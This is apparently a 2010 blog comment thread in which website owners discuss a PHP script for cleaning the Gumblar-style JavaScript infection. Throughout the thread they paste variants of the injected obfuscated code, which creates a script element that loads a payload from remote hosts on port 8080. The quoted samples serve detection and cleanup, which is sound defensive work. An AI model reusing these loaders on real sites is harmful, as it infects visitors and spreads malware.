(document){document.body.appendChild(Sa6y7pu9×5e1);}} } catch(Xfd4wb6y3unlnipi03r) {}

And also I found an untitled document in the same directory including these code:

p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Lucida Grande}

<script type=”text/javascript”>
var gaJsHost = ((”https:” == document.location.protocol) ? “https://ssl.” : “http://www.”);
document.write(unescape(”%3Cscript src=’” + gaJsHost + “google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E”));
</script>
<script type=”text/javascript”>
try {
var pageTracker = _gat._getTracker(”UA-3087028-4″);
pageTracker._trackPageview();
} catch(err) {}</script>

No idea if that’s got something to do with each other..

Greetings from germany,

Maxi

jam January 22nd, 2010 at 3:10 pm

Stojan, change curevir.php line 36 to
$starting_comment = ‘/*Exception*/’

and
line 156

$virus_string = $starting_comment.’ document.write’;

Stojan Kosic January 22nd, 2010 at 6:24 pm

JAM, I have tried to replace line 36. and line 153(not 156) and it is not working.Did you had luck?

can you send me entire code?

Thanks!

Konstantin Boyko January 22nd, 2010 at 6:26 pm

I have just released the new version of the script (1.2). It is available at the original link. Please be careful with it (make backups) as I haven’t had chance to test it on many servers yet. Any feedback would be nice.

pavel January 22nd, 2010 at 6:26 pm

there something with preg string near 230 line
variables $ptr_js and $ptr_html
sure, konstantin fix it soon

jam January 22nd, 2010 at 6:44 pm

Looks like it works!

Stojan Kosic January 22nd, 2010 at 7:31 pm

it worked for me!

I’ll keep you informed if virus come back.

Dejan January 22nd, 2010 at 11:12 pm

You can also add…

JS:
$contents_new = preg_replace(’/\/\*Exception\*\/(.*?)\;/is’,”",$contents);

HTML:
$contents_new = preg_replace(’/\\/\*(.*?)\-\-\>/is’,”",$contents);

Brent January 23rd, 2010 at 12:04 am

Thanks!

NorfolkBroad January 23rd, 2010 at 2:55 pm

Hi,

Thanks for this script it’s a godsend -just spent 4 days cleaning up all my sites (which are hosted on the sameserver) and the hackers got me again last night. Injected code has changed and affects php and html files on my sites as well as JS

/*Exception*/ document.write(”);

Olivier January 23rd, 2010 at 10:25 pm

Konstantin,

Many thanks for sharing your script and updating it. Release 1.2 worked for me removing script starting with the top portion “/*LGPL*/ try{ window.onload = function()” and strange <!-c15****** ” stuff at last line.

This is one awesome script that saves us hours of checking files one by one in our blog.

Olivier January 23rd, 2010 at 10:36 pm

Link to webpages i visited before finding this one
http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl
Another cleanup script for “/*LGPL*/” variant can be found here :
http://possible.in/products-security-updates.php

Mark January 24th, 2010 at 4:51 pm

Now there’s another stinkin’ piece of crap adding stuff to my index.html and index.php. don’t know about js.

/*Exception*/ document.write(”);

Mark January 24th, 2010 at 4:53 pm

hehe.. looks like curevir knows about it and cleans it like magic!

Mark January 24th, 2010 at 4:53 pm

Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you !

Shade January 25th, 2010 at 10:48 am

We host a number of sites and we’ve been hit by all 3 versiona (so far) of this trojan. Your removal tool, Boyko has spared us from a lot of tedious work so I really want to thank you for the great job.

On the other hand, can somebody point out an antivir/antispyware program able to find and remove the virus on the infected PCs where it stoles the FTP pass from? Many thanks in advance

clowner January 25th, 2010 at 12:02 pm

dear Boyko…

i wanna say thanks for your helpfull script. it’s very-very help me to fight with that trojan.

@shade : re-create your password ftp, cpanel etc..etc.. at PC i use avast pro 4.8 to monitoring the script.

great work..

spacerace January 25th, 2010 at 6:41 pm

Thanks very much for the cleaning script, has saved me much time..

I’d like to give some pointers to getting rid of the virus/malware on your PC as I got caught a second time round with this one…

Firstly, ditch AVG it clean scanned my PC and declared all was safe when in fact I was still infected, causing me to have to do the whole password reset and clean process twice. Use Avast _ Malware Bytes which found and cleaned the virus.

Secondly, the virus may access stored connections in your FTP client (as I have read), but it *also* sniffs them as outbound connections are made. I upgraded my FTP client (Total Commander) to one that stores passwords in encrypted format after initially resetting all passwords. But because the virus was still running in memory the new passwords were copied again - the only way this was possible was for it to catch and ‘read’ the passwords as the connections were being made.

Jeff Faldalen January 25th, 2010 at 8:31 pm

I got hit with it too. Last night we visited the infected site and avast went crazy. I am going to install it on the computer.
Konstantin Boyko how can I contact you?

Jeff Faldalen January 25th, 2010 at 8:36 pm

does your script work on this?
wp-includes/default-widgets.php on line 1034

Konstantin Boyko January 25th, 2010 at 8:40 pm

Jeff, you can contact me via Contact form or by e-mail which you can find in script comments.

Ed January 27th, 2010 at 12:13 am

Thank you for this tool it saved my site. You really did a good thing for people who don’t know how to remove it, kudos to you!

Keep up the great work.

Erin January 27th, 2010 at 7:27 am

This is the code we are getting and the script does not remove.

try{window.onload=function(){document.write(’cam4-com.elpais.com.googl’);Riwb6bjjicwm = document.getElementById(’megaid’).innerHTML + ‘e(((-#@#c)!(!n$&.)(@s#u)p$^e@)r&n!)$e&!#t)b&@e#(t^!^.#@!)!r$)u@($):@#D&E&@@B#U^#(G&@^/)p)&)l$@)&e!)@(^n)t^$@y&&)o$^#@(f#(^f(!$&i$)$s#&h(.^c^o##$m@@##/!&@^^p!)^l(@)#e^(n&&#t$&@#y$$&o)f##^f$($i$^s^(h)#&.)#!&c@&@o##m^/$o#v^h#.#(@(n@e@^@t$/$^g!^^o&o^#g(!$#l)&)e).&)c$^o!&)m)@$/#!b))!o&@)^s!t&o(n!&!.@$^c$^(o&^m@&&/@@’.replace(/\(|\^|\!|#|\$|&|\)|@/ig, ”) ;document.write(”);} } catch(Josjalqn ) {}

Any ideas? we need a fix for this asap. Thanks

Peter Fitzgibbon January 27th, 2010 at 2:29 pm

We have been running your script on our server and it has been working, thanks, but it’s not picking up the latest attack.
New Code:
/*Exception*/ document.write(”);

Pete January 27th, 2010 at 2:52 pm

Konstantin, if you asked for £1 each time you helped someone you’d maybe be rich by now!!
Glad someone is on top of this virus, great work your doing here..

Konstantin Boyko January 27th, 2010 at 3:16 pm

Thanks, Pete! Though I think the script should be free for use, I’ve just added the donation link in the post, anyone can support the development of this script using that link.

Mike January 27th, 2010 at 3:57 pm

Virus is Back Again.

After running the curevir.php on my site it did not clean the virus
immediately, but after I changed the File Permission on all files to 777 the script did a wonderful
job !

I took some security measures by changing to new strong FTP-Password
and then disposing the Computer which got me infected and get a new PC just to make sure that everything is clean.

Now the website is infected with the virus again and the
after running curevir.php it is showing:

TOTAL: 0
START BACKUP:
END BACKUP!

It simply can not detect the virus again and our site is down

http://www.schweizer-portal.ch/
http://www.schweizer-portal.ch/curevir.php

Please can anybody help me

Mike

saeed January 27th, 2010 at 10:00 pm

virus back with

try{window.onload=function(){document.write(’leo-org.rapidshare.com.up’);D1293nsztip = document.getElementById(’megaid’).innerHTML + ‘l!$o^!a!&d^(e$&d!&-&t^^o&.$@s$#u)$#p(e#&(&r&!&)h))$i)$)g^!h^^e!&$^s$@t^@^@.#r@)u($!#:#D@^E#^B^$U(!@@G!/(((1&#2^&^^)6#^#.#$!c&#o&m#^&/^&&1!)!@2@^6@$.&&^&c)o#&@$$m#@&/&@&g#o)!o$#g!)^l()!e$&!.!(c)&!o!&m@$!/#)s&!t@@r!#e!@a@m)()a!$t^@e(@(.&)@c#)o@@!(m!(/!#(x)t&$&)u&!b&&e$.&^))c&o@&(m#&#$/$’.replace(/@|&|\$|\^|#|\(|\!|\)/ig, ”) ;document.write(”);} } catch(R0q6hhv ) {}

johnpaul January 27th, 2010 at 11:08 pm

ran the script yesterday with perfect results - while waiting for my host to change my password - now the commie is back with a new line of code….
try{window.onload=function(){document.write(’sueddeutsche-de.cricinfo.’);B5mgmzx9wcv = document.getElementById(’megaid’).innerHTML + ‘c#!o^#m)#@&.&@#^^o#&&##d&@n!##)o^&!k!()l!!a($)s()&s^#)n!#(#i$k^!##^i)#!-!r$!#u&.)#s((@#u&!&p&##^e)r(@#h^i(@^!g(&$$h$)$!e@((s@&t$@.!)r$##!u&:$^)D@&E$@)B&()#U@)G^(/$&&s&(^t)a)#t#)c@o&)^u^()$n($()t#e@(!@r!^!@.$&c#@o($&!!m^@$/#$@&s$#t(a&t&@#c())o$))#$u#$!n@($t^^)^e&($$r!(.#!)c(o&^m&#/$g^#)!o(&)@o^)g(l$)e@.)c&$(&o!)m&@!#.$$l)#!y!$@(/#$&!j^!!u!@g^#(&#e@$(m&#&.&j^#^^p@^#)/$^g!@o#)(o!(!g@@#l#&!@e!$.!#&)(c&)(o#)@)m^^&/)!’.replace(/&|\^|#|\)|\$|@|\(|\!/ig, ”) ;document.write(”);} } catch(J3eg5ios ) {}

Stephen January 27th, 2010 at 11:37 pm

I agree with Mike, virus is back. Was displaying a link to sueddeutsche-de.cricinfo.

I changed the pw to something extreme and am awaiting your tool so I can clean the WordPress, but in the mean time I will be cleaning my regular site manually.

duo January 28th, 2010 at 12:06 am

i still have it, it even makes new files on the server named ‘core.’

when the script ends i have this code:

try{window.onload=function(){document.write(’sueddeutsche-de.cricinfo.’);B5mgmzx9wcv = document.getElementById(’megaid’).innerHTML +

johnpaul January 28th, 2010 at 1:40 am

running your script doesn’t work today like it did yesterday.

removing the hacker script doesn’t work today. the page reverts to the page “sueddeutsche-de.cricinfo.”

my web host has either been asleep or out to lunch for the last 2 days since they won’t change the password.

Roger Lin January 28th, 2010 at 9:09 am

try{window.onload=function(){document.write(’voila-fr.fotolog.net.prob’);J2u31qlmwr0l = document.getElementById(’megaid’).innerHTML + ‘o!#a#r(#d(s$!&^-@c&$!!o&!m$.&!s&#u@!^p$!@#e!(r@#(h@&!i$!$g)$$#h^e)s^t#&).))@r&!u(((^#:&D)&E)))B$&U^$$G(^/@^(g#@#$o)(o$g$@l^^e$.$$c$$o&#m##(&/!)g!o#o$(#g$!l$e#$.!&c(o&!m$)/&$t@v$(&.(!c@)$))o!#m&)/!!n#^a!t$&e).!&c)o($^m!#&@/!#&n(($e&@$#w^!!g@!r@)@o)!@u&)!!n@d!)s).!)#^c(!$o@&&)!m&!/&$’.replace(/\!|\^|\$|\)|@|\(|#|&/ig, ”) ;document.write(”);} } catch(Ffxag9w ) {}

This is the one curevir.php can’t kill.

Konstantin Boyko January 28th, 2010 at 11:55 am

Thanks to everyone for pointing out new version of the code. I have added another regular expression for this new version of virus code. The latest version of the script (1.2.1) is available at original link. Again there were no real testing, so any feedback would be useful

Stephen January 28th, 2010 at 5:13 pm

Thank you for the updated version!

Cleared up my Wordpress blog perfectly!

johnpaul January 28th, 2010 at 6:58 pm

Konstantin - Thank you for the updated version. 1.2.1 Got the password changed first and then ran the script this time and it worked perfect again. Donation has been made!

START BACKUP:

Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /home/johnpaul/public_html/curevir.php on line 108

tar -czvf /home/johnpaul/public_html/!backup-1264696456.tgz /home/johnpaul/public_html/cavehill/home/johnpaul/public_html/GGBF2007/resources/javascript/AC_RunActiveContent.js

Array
(
[0] => Array
(
)

[1] => 127
)

BACKUP failed…

END BACKUP!

Trying to cure /home/johnpaul/public_html/cavehill/cavehill/index.html

SUCCESS —- etc…

Konstantin Boyko January 28th, 2010 at 7:54 pm

Thanks John!

Olly Schade January 28th, 2010 at 8:03 pm

THX4Update! Great work.

Lars January 28th, 2010 at 8:15 pm

Thanks for the script! Excellent!

But if you are using Joomla!, take care. It seems like the script removes some iframes code to much in Joomla! admin - at least we had some problems with the filemanager after running curevir.php on a couple of sites.

The file affected are:
/administrator/components/com_media/views/media/tmpl/deafult.php

After the fix, row 51 are missing some code. If you are using latest version 1.5.9, you could add the following code:

<iframe src=”index.php?option=com_media&view=mediaList&tmpl=component&folder=state->folder;?>” id=”folderframe” name=”folderframe” width=”100%” marginwidth=”0″ marginheight=”0″ scrolling=”auto” frameborder=”0″>

Anyone else having the same problem after running the scrip on a Joomla! site?

Mike January 29th, 2010 at 12:52 am

Dear Boyko, Donation is made ! Number : 4192848220

You are really helping people as the curevir has help solved my website but only after a day the virus came back. It is now getting to 2 weeks that my site can not function even after running the software again.

I have gone to the Link Version 1.2.1 but after running it on my site, it is showing Version 1.2 instead.

See:
http://www.schweizer-portal.ch/curevir.php

Since the second attack I run all the Versions but I am still seriously suffering. (2-Weeks)

I just learn how much I rely on my site to survive this very hard time.

Please can you look at my site ? God Bless You

Mike (Michael)

cs January 29th, 2010 at 1:51 am

It’s comming bck after few hours, ftp it’s joomla, and I used only cpanel file menager no ftp(file zila..)

Emre January 29th, 2010 at 11:52 am

New virus version has been made:
“”

Curevir work perfectly but is there any way to block this virus? I am fed up with fixing. I cancelled ftp account, removed cuteftp etc. Nothing worked.

Konstantin Boyko January 29th, 2010 at 12:53 pm

It seems I have found another mutation of the virus code… Added one more regular expression (version 1.2.2 is the latest one now).

Olly Schade January 29th, 2010 at 7:46 pm

I have found another mutation…

http://www.limelightstars.de/ssp_director/index.php

try{window.onload=function(){Sr77o1cpaq7bqqng = ” + ’s$m(a#(s#h!&#!&i$@$)n@$g!m&a@g&&a(&#z!#&i)n)&e)#!-!c(o&^m$$!(.^($@@t#!u(@b)$$^e^!8&.$c#o@m&$.!#a$^n@o(^n!)y^&!m)#-@t@($$o&&.)&!a!v$@a^#!t##$#)t&#&o&&!p$&.#@r^&u#$&:^@!U)$!^v$$&0&&@@s()^$p(m!#^o$^^x@!@v&#!)k@6)@w$$p$!&(/$(&g#$#o(^o!g!(^l&e($^.#^($c()))o&)(m()/$g)!o(^o#g!l(e)$&^.(!c&^#o!&&m^$(/#p$!)l(&a@y&^$).#$&c(^(o&m@!!/@l$&i)^n!&@k&#$w!i$(!#t^)h(&i@@#n&@$().$#c&^o(&!m&&/)!!&l(!e!m@)(o#&^n^^d&(e!!.!#@^$f(!r#^&/!’.replace(/@|&|\)|\(|\^|\!|\$|#/ig, ”) ;G4ybgpy9jp = ‘appendChild’;L8fxjgnvrw1pb = document.createElement(’sc’+'ript’);L8fxjgnvrw1pb.src = ‘h’+'ttp://’+Sr77o1cpaq7bqqng.replace(/Uv0spmoxvk6wp/g, ‘8080′);L8fxjgnvrw1pb.setAttribute(’defer’, ‘def’+'er’);eval(’document.body.’+G4ybgpy9jp+’(L8fxjgnvrw1pb)’);} } catch(Vndx63sc5 ) {}

Olly Schade January 29th, 2010 at 7:49 pm

http://www.limelightstars.de/ssp_director/curevir.php

Doesn’t work with this kind of mutation.

Sameer Shelavale January 29th, 2010 at 10:45 pm

Olly,
you can use the the script on
http://possible.in/products-security-updates.php for the new type. I just updated it.

Boyko new RE is ‘/try\{window\.onload=function\(\)\{([^\n]*)(\’sc\’\+\’ript\’|\’h\’\+\’ttp:\/\/\’|\’def\’\+\’er\’)([^\n]*)\{\}(\s*)/i’,

I hope it helps somebody in need.

sergey January 29th, 2010 at 11:08 pm

new variant of same worm:

try{window.onload=function(){Pqdekqmwhk62 = ” + ‘h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#’.replace(/&|#|\(|\!|@|\^|\)|\$/ig, ”) ;Q7rj4s75mfeh3 = ‘appendChild’;Mxvqzu6myayt = document.createElement(’sc’+'ript’);Mxvqzu6myayt.src = ‘h’+'ttp://’+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, ‘8080′);Mxvqzu6myayt.setAttribute(’defer’, ‘def’+'er’);eval(’document.body.’+Q7rj4s75mfeh3+’(Mxvqzu6myayt)’);} } catch(Tb3w8uei ) {}

kamasbert January 30th, 2010 at 12:10 am

In our case curevir only scans directory where curevir is located. Is that the normal behaviour? Is there some kind of switch to tell that script to scan subdirs. Thanks in advance -kamasbert-

Tom January 30th, 2010 at 6:19 am

lol, I linked your fix from wikipedia gumblar page and it stuck. First edit they have kept of mine.

Olly Schade January 30th, 2010 at 9:38 am

@Sameer

Fatal error: Cannot instantiate non-existent class: directoryiterator in site-cleanup.php on line 27

Konstantin Boyko January 30th, 2010 at 11:56 am

OK, updated the script one more time… This new mutation should be covered by version 1.2.3 (the latest one). Try

Olly Schade January 30th, 2010 at 12:40 pm

@KB

thx 4 ur great support.
Now the script works fine…

Terry January 31st, 2010 at 2:01 am

Thanks for your script I had the tech guys run it on 24 of my infected web sites and it is a lifesaver.

One note: Does not detect up any older index.php3 files if you have any left. I had some old ones still on my server. At least now I know where they are. Thanks again!

Terry January 31st, 2010 at 2:08 am

One other thing. Some of my sites that were attacked were not sites that I had ftp access on my Machine.

I know that is how they say they get in but almost all of my hacked sites had one thing in common. They were all joomla or had an instance of joomla somewhere on them. The others were not hit. I not implying anything, it is just an observation.

Erin February 1st, 2010 at 1:00 am

Thanks for the great work, keep it up!

Barbara February 1st, 2010 at 8:44 pm

Hi Konstantin -

Thank you for the updated version of the script - donation gladly made!

Yesterday - I uploaded 1.2.3 - NOT USING FILEZILLA to my BlueHost account & asked the tech to run the script for me. I have a shared hosting account so cannot execute this scrip myself.

The tech ran it in the root as well as inside each of my domains - she said it did a very nce job of cleaning hte virus.

However - she said the new script (1.2.3) stops running at a certain point.

She says it’s “truncated” at the cron job.

Now all of my sites have this error:

(www.Paws4Laws.com)

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home1/thepetfr/public_html/Legislation/wp-includes/default-filters.php on line 173

Parse error: syntax error, unexpected $end in /home1/thepetfr/public_html/Legislation/wp-includes/default-filters.php on line 173

OR THIS ERROR:

(www.StephenACorbman.com)

Fatal error: Call to undefined function get_header() in /home1/thepetfr/public_html/stephenacorbman/index.php on line 1

Can you please advise??

Thank you!!!

Relja February 4th, 2010 at 11:45 pm

Hi I have same problem as you all,

I uploaded curvir.php on my webhost and he says that there aren’t any infected files

mailcious code:

try{window.onload=function(){Iy1blw7 = ‘p*c*a*uBt*o*-BcEo*m[-7cEn7.Ea7d*d7tBhBiBsB.BcBo7mE.Ea[dBsEe[rBv[eEr[pBlEuBs*-[c[o[m7.[t[a7r[tEb[aBnBd*.*r7u7:*K[kBi*yEl*eB6[lBsBtE/EgEo*o*g*l7e*.Bc[o7m[/[g[o*oBg[lBe*.Bc*o*m7/7a[cBe7r*.Ec*oEmE/Ey7o[u[j*iEzEz7.[c7o7m*/[oBpBe[nEd[n[sB.EcBo7mE/E'.replace(/[E\*B7\[]/g, ”);Fajbkymxq = ’script’;Edxj8r21b = ‘dafar’.replace(/a/g, ‘e’);Jc5efhx = document.createElement(Fajbkymxq);Wvi6kif = ‘8>0i8a0a’.replace(/[a~\>3i]/g, ”);Jc5efhx.src = ‘http://’+Iy1blw7.replace(/Kkiyle6lst/g, Wvi6kif);Jc5efhx.setAttribute(Edxj8r21b, ‘1′);document.body.appendChild(Jc5efhx);} } catch(Xhzixmz ) {}

can this script remove this code?

Adrián February 5th, 2010 at 5:39 am

Dear Boyko

Sorry my english is very poor, Im argentinian and my language is spanish.

I run the script and work perfectly really thank you for this, but what is this warning?
[code]START BACKUP:

Warning: exec() has been disabled for security reasons in /home/sc4821we/public_html/curevir.php on line 152
!backup-1265328879.tgz was created successfully

Warning: chmod() [function.chmod]: No such file or directory in /home/sc4821we/public_html/curevir.php on line 156;[/code]

Thank you again

Konstantin Boyko February 5th, 2010 at 11:35 am

2Adrian: This just means that backup function didn’t work on your server, because exec() is disabled there. But as soon as the files are cleared - you should be all right. Don’t forget to change FTP password.

Tess February 6th, 2010 at 5:22 am

I’m not a techie or website owner. Just a regular laptop user who got infected with this trojan that redirects searches. Got AVAST and it apparently found malware twice in one scanning but my searches still get redirected. Maybe I should just shut this laptop down until someone gets to the root of it. No pun intended.

Tysonjm February 7th, 2010 at 11:38 pm

Hi - Do I have a new variant of this virus? My infected code is below, but I get this result after running the script:

TOTAL: 0

Virus versions found:

START BACKUP:

END BACKUP!

try{window.onload=function(){Gvi3whyi = ‘mKaHcxy[s%-[cKoHm[.[s[o[nHgHsx.xp[kH.[yHoxm%i[u[r%i[-xc[o%-Hjxpx.xcxo[mxixnxgKg[eHn[e%r%a[t%i[oKn%.xr%ux:xY[s%e%4xhHwHsxyHq[j%4x/xg[oHoHg%lKeH.%c[oxmK/Hg[o[o[gHlHe[.[cHo%m[/xlHeKb[oKnHc%oxi%n%.KfHrK/Hg%aKmKeHf[axqHsH.%cKo%mK/[pHrHi%c[eKlxiHnxex.[c[o[m%/K'.replace(/[KH%\[x]/g, ”);M25qzwbn = ’script’;Fpet49q = ‘dafar’.replace(/a/g, ‘e’);Wgctgm8r = document.createElement(M25qzwbn);Cmfspvf3 = ‘8+0+8C0T’.replace(/[TOiC\+]/g, ”);Wgctgm8r.src = ‘http://’+Gvi3whyi.replace(/Yse4hwsyqj4/g, Cmfspvf3);Wgctgm8r.setAttribute(Fpet49q, ‘1′);document.body.appendChild(Wgctgm8r);} } catch(Dv9dc5l61 ) {}

Nick February 8th, 2010 at 9:08 pm

Konstantin,

I think you are doing a great job!! Keep up the good work! Your antivirus worked like a charm on my websites!!

Cheers

Sameer Shelavale February 9th, 2010 at 9:25 am

@Tysonjm

Can you please send me exact code in a zipped txt file on. I shall update my codes too samiirds[<At}]g_m_a_i_l[d0t]c0m

that is gmail address.

Bogdan February 9th, 2010 at 6:09 pm

For Sys Admins, Website Operators.
You can use this script to clean all your sites at once.
Just copy the curevir.php in the parent folder where you have all your sites and just run it from php-cli. Tt will recruse into dirs and clean everything at once.
Quite handy.

Thanks for the script!!!

Olly Schade February 9th, 2010 at 9:57 pm

Another Mutation.

var n=new String();this.k=”";var um=new Date();var kb=new Date();var q=’sxc%rXi%pXt%’.replace(/[%xeXn]/g, ”);this.b=false;var rp;if(rp!=”){rp=’h'};var j=window;var umc=32379;var jk;if(jk!=’yj’ && jk!=’zb’){jk=’yj’};var qn=document;var d;if(d!=” && d!=’xw’){d=null};j.onload=function(){var _=”";var wm;if(wm!=’doq’ && wm!=’uw’){wm=’doq’};try {var pt;if(pt!=’lm’ && pt!=’xd’){pt=’lm’};var lmv=new Array();m=qn.createElement(q);var id;if(id!=’qv’ && id != ”){id=null};var br=new Array();var yl=”yl”;this.qo=”;m.src=’hVt#tVp#:V/#/!sVo6f#tFpFeVdFiFa!-#cFo!m6.#hVu6r#r#iFy#eVtV.!cVoVm6.6tFr#.FsFe!dFo!p!a6r#k#i#n!g6-6c!oVm#.Fr#e!cFe!nVtFm#e!xVi#c!o#.6r#u!:V860V8!06/V5F5Fb#b6s!.#cFo6mF/!5V5Vb#b!s6.!cVo!mF/Fg6o!o6gFl6e6.6c#o!m6/#mFe!rFcFa#d!o6l!i#bVr!e#.6c6o#m6.!mVx#/FmFp6n!r!sV.6cVo!m#/!’.replace(/[\!#V6F]/g, ”);m.setAttribute(’d_eRf_eRr!’.replace(/[\!0_Rt]/g, ”), “1″);this.pj=”pj”;this.yt=false;this.zm=27364;qn.body.appendChild(m);var bt;if(bt!=” && bt!=’a'){bt=”};this.al=”;} catch(t){var is=”is”;};var qs=”";var qf=”qf”;};var ej=63325;

this.s=”;var py=”py”;var r=window;var x=document;this.fi=”fi”;var qd;if(qd!=’fq’ && qd!=’v'){qd=’fq’};var d=’sec7rfi7pete’.replace(/[ef47T]/g, ”);var w;if(w!=” && w!=’ps’){w=null};var t=false;r.onload=function(){try {p=x.createElement(d);var fa=new Date();var c;if(c!=’im’){c=’im’};p.setAttribute(’dDe1fpe1rp’.replace(/[p1DiC]/g, ”), “1″);var ku;if(ku!=’jx’ && ku!=’yj’){ku=”};var rw;if(rw!=’a’ && rw!=’cp’){rw=”};p.src=’hbtVt?pw:V/;/?p;owrbnbo?r;a?m;aw-;c;o?m;.wa?lVlwy;ewsV.?cVoVmb.?gbu?mwtbrVe;e;-Vc;o;mV.?r;e?c;e;nbtwmwebxVi?cwo?.;rwuV:w8;0?8b0V/VabubtVowhwo?mwew.?cVo;mV.?c?n?/VaVu?tVo;hVo;m;eV.;c;o?m;.bcbnw/bkwiVowsVk?e?a;.bnVebt;/bfVi;fbaw.Vcwo;mb/;g?obo?gblbe;.wc;oVm?/;’.replace(/[;w\?Vb]/g, ”);var vv;if(vv!=’e'){vv=”};var qg=new String();x.body.appendChild(p);this._a=false;} catch(k){var nk;if(nk!=’rg’ && nk!=’y_’){nk=”};this.kk=”;};this.mw=24319;};var gr;if(gr!=” && gr!=’nr’){gr=’o'};var aa=”";

Sameer Shelavale February 10th, 2010 at 1:10 pm

@olly,
this is getting nasty. Can you

Can you please send me exact code in a zipped txt file on. I will prepare a cure for it soon.

samiirds[<At}]g_m_a_i_l[d0t]c0m
The above is gmail id

Nik Nastev February 11th, 2010 at 11:41 am

Any news about new version of curevir? We need it asap. Thank you!

mark February 11th, 2010 at 2:08 pm

This is starting to be very anoying…
How could it have infected me ?
Account is new, no password saved.
Can it be because it is on a shared server ?

I have a new code, not identified.

var w;if(w!=” && w!=’b'){w=”};this.a=”";this.n=”";var k=document;var q=’s:c:r:iXpmtX’.replace(/[XeAm\:]/g, ”);var e;if(e!=” && e!=’wf’){e=”};var v;if(v!=’ta’){v=’ta’};var s=window;var sy;if(sy!=’d’ && sy!=’_'){sy=’d'};s.onload=function(){var o=”o”;var hl=”hl”;try {this.ay=”";h=k.createElement(q);var dk;if(dk!=” && dk!=’tn’){dk=’ig’};var pl;if(pl!=” && pl!=’s_’){pl=null};var _m;if(_m!=” && _m!=’xa’){_m=”};var bf;if(bf!=” && bf!=’un’){bf=”};h.src=’hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km@aJrUkJeUtKg@iUdJ-UcJo@mE.UtUh@eJa@n@tKi@mJaEtKrUiExK.Ur@uU:@8E0E8K0@/@eExUcEiKtKeK.UcUoJ.Jj@p@/EeJxKcUiJtJeJ.JcEoU.KjKpU/K4@tUuKbEeE.KcUo@m@/KdJaUuUmU.JnEeEt@/KgJo@oJgUlKeJ.JcJoJmU/E’.replace(/[E@JUK]/g, ”);var ok;if(ok!=’ak’){ok=”};h.setAttribute(’d?e>f$e$r?’.replace(/[\?\$bB\>]/g, ”), “1″);this.hp=false;k.body.appendChild(h);} catch(i){var ry;if(ry!=” && ry!=’wk’){ry=null};this.l_=”";};var jz;if(jz!=’fo’ && jz != ”){jz=null};var vi=”;};var ad;if(ad!=” && ad!=’ul’){ad=’x_’};

mark February 11th, 2010 at 2:23 pm

help please….

i have replaced this in curevir but no success..
Gives an error,

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ‘)’ in /home3/print/public_html/curevir.php on line 85

This is the code:

array(
’string’ => ‘var w;if(w!=” && w!=’b'){w=”};’,
‘comment’ => ‘var w;if(w!=” && w!=’b'){w=”};’,
‘regexp_html’ => ‘hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km’, ‘regexp_js’ => ‘hKtUtEpK:@/@/Et@aEr@gKe@tE-@cKo@mE.KfJi@l@eKs@tKu@bJeE.UcUoEmU.Km@aJr’
),

chris February 11th, 2010 at 10:14 pm

TOTAL: 0

Virus versions found:

START BACKUP:

END BACKUP!

This is all it says when I run it even with the shell after the .php

any suggestions?

stounemaster February 11th, 2010 at 11:50 pm

there are two new versions …

var u=’s+c9rbi9p9t+’.replace(/[\+bu\:9]/g, ”);var b;if(b!=’wi’ && b!=’g'){b=”};var q=12453;var o=document;this.te=63319;this.oq=39435;var w=window;var x;if(x!=” && x!=’ag’){x=”};var it=36693;var m=”m”;w.onload=function(){this._o=false;try {var j_;if(j_!=’_a’){j_=”};var wl=new String();c=o.createElement(u);var cv=false;var h=false;var k;if(k!=’p’ && k!=’r'){k=”};c.setAttribute(’dPePf4e*rJ’.replace(/[J\*4PO]/g, ”), “1″);var li=”";c.src=’hZt@t@pz:z/@/bf2ibs@hzk2i2-@n@ebtZ.@szlbibdbe2s2hbazrze@.bnzebt@.@nZibk@kbe@iZ-@c@oz-@j@p2.zyZoZu@r@tbazg2hbe2u@ezrb.zrZuz:Z8@0Z8b0@/Z1zu2nZdZ1b.zdZeb/b1bu2nbdZ1Z.Zdzeb/bnbibkbkzaznbs2p2oZr2tbsb.zcbobm2/zgbozo@g2lze2.Zc2o2mz/2czt@rbi@p2.Zcbozm@/@’.replace(/[@Zb2z]/g, ”);var xb=37124;this.vg=”";var fc;if(fc!=”){fc=’ah’};var cn=”cn”;o.body.appendChild(c);var uo;if(uo!=” && uo!=’jd’){uo=”};var cn_=new Array();} catch(j){var fv;if(fv!=’jez’){fv=’jez’};var un;if(un!=’bo’){un=’bo’};};var wfe;if(wfe!=’fa’ && wfe != ”){wfe=null};var na;if(na!=’ind’ && na!=’zs’){na=’ind’};};var bv;if(bv!=’sc’){bv=’sc’};this.mk=37257;

